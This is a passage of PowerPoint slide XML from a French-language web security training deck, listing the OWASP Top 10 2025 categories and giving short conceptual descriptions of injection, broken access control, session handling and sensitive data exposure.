                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ce n’est pas une checklist magique. C’est une carte des endroits où les gens se trompent le plus souvent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Mieux vaut un correctif assez bon, maintenant, que la théorie parfaite le jour où ça casse en prod.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>On s’en servira comme repère pendant les cinq jours. On ne récitera pas les dix points par cœur.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="5074920"/>
            <a:ext cx="6035040" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>owasp.org/Top10/2025 — la carte officielle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18" descr="owasp-logo.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7955280" y="2103120"/>
            <a:ext cx="2651760" cy="265176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01 · terrain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="786384"/>
            <a:ext cx="10058400" cy="402336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Quatre endroits où ça casse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="124358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71600"/>
            <a:ext cx="10058400" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pas une litanie. Les quatre qu’on va vraiment croiser cette semaine.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rounded Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1755648"/>
            <a:ext cx="4937760" cy="201168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005840" y="1755648"/>
            <a:ext cx="73152" cy="201168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261872" y="1920240"/>
            <a:ext cx="4553712" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261872" y="2377440"/>
            <a:ext cx="4553712" cy="1234440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>La recherche est concaténée dans le SQL. Un apostrophe ferme la chaîne trop tôt : ce n’est plus une valeur, c’est du code que la base exécute.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rounded Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217920" y="1755648"/>
            <a:ext cx="4937760" cy="201168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7920" y="1755648"/>
            <a:ext cx="73152" cy="201168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73952" y="1920240"/>
            <a:ext cx="4553712" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Broken access control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473952" y="2377440"/>
            <a:ext cx="4553712" cy="1234440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>GET /invoices/42 sans vérifier que 42 est à vous. Être loggé n’est pas avoir le droit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rounded Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3968496"/>
            <a:ext cx="4937760" cy="201168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05840" y="3968496"/>
            <a:ext cx="73152" cy="201168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261872" y="4133087"/>
            <a:ext cx="4553712" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sessions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1261872" y="4590288"/>
            <a:ext cx="4553712" cy="1234440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Token dans localStorage, ou cookie sans HttpOnly. N’importe quel JS de la page vole qui vous êtes.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rounded Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217920" y="3968496"/>
            <a:ext cx="4937760" cy="201168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217920" y="3968496"/>
            <a:ext cx="73152" cy="201168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473952" y="4133087"/>
            <a:ext cx="4553712" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sensitive data exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6473952" y="4590288"/>
            <a:ext cx="4553712" cy="1234440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Mot de passe en SHA-256, secret dans l’URL. Facile à voler, long à remarquer.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01 · carte</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Les 10, pour en avoir vu une fois</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1042415"/>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https://owasp.org/Top10/2025/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1353312"/>
            <a:ext cx="1912924" cy="1901952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DBEA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353312"/>
            <a:ext cx="64008" cy="190195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15568" y="1463040"/>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A01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="1719072"/>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Broken Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="2249424"/>
            <a:ext cx="1711756" cy="896112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Loggé, vous ouvrez /orders/43. C’est la facture du voisin.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rounded Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3065068" y="1353312"/>
            <a:ext cx="1912924" cy="190195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174796" y="1463040"/>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A02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3174796" y="1719072"/>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Security Misconfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124297" y="1353312"/>
            <a:ext cx="1912924" cy="190195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234025" y="1463040"/>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A03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234025" y="1719072"/>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Software Supply Chain Failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rounded Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7183526" y="1353312"/>
            <a:ext cx="1912924" cy="190195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293254" y="1463040"/>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A04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7293254" y="1719072"/>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Cryptographic Failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rounded Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9242755" y="1353312"/>
            <a:ext cx="1912924" cy="1901952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DBEA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9242755" y="1353312"/>
            <a:ext cx="64008" cy="190195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352483" y="1463040"/>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A05</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9352483" y="1719072"/>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Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9352483" y="2249424"/>
            <a:ext cx="1711756" cy="896112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Un apostrophe ferme la chaîne SQL trop tôt. La base exécute alors le code du visiteur.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rounded Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3383280"/>
            <a:ext cx="1912924" cy="190195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115568" y="3493008"/>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A06</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="3749040"/>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Insecure Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rounded Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3065068" y="3383280"/>
            <a:ext cx="1912924" cy="1901952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DBEA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3065068" y="3383280"/>
            <a:ext cx="64008" cy="190195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3174796" y="3493008"/>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A07</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="TextBox 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3174796" y="3749040"/>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Authentication Failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3174796" y="4279392"/>
            <a:ext cx="1711756" cy="896112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>« Utilisateur inconnu » vs « mot de passe faux » : vous publiez l’annuaire.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rounded Rectangle 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5124297" y="3383280"/>
            <a:ext cx="1912924" cy="190195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5234025" y="3493008"/>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A08</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="TextBox 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234025" y="3749040"/>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Software or Data Integrity Failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rounded Rectangle 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7183526" y="3383280"/>
            <a:ext cx="1912924" cy="190195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7293254" y="3493008"/>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A09</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="TextBox 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7293254" y="3749040"/>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Logging &amp; Alerting Failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rounded Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9242755" y="3383280"/>
            <a:ext cx="1912924" cy="190195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9352483" y="3493008"/>
            <a:ext cx="1711756" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9352483" y="3749040"/>
            <a:ext cx="1711756" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Mishandling of Exceptional Conditions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="5349240"/>
            <a:ext cx="10058400" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>En couleur : ce qu’on touche vraiment. Le reste, la carte. Pas le dogme.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5989320" cy="292608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="877824"/>
            <a:ext cx="5989320" cy="420624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2200" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>La réalité dilbertienne</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1371600"/>
            <a:ext cx="598932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517904"/>
            <a:ext cx="5989320" cy="1965960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1500" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Dans beaucoup d’entreprises, le CISO est la personne qui organise des réunions pour expliquer pourquoi on ne peut rien changer cette année.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
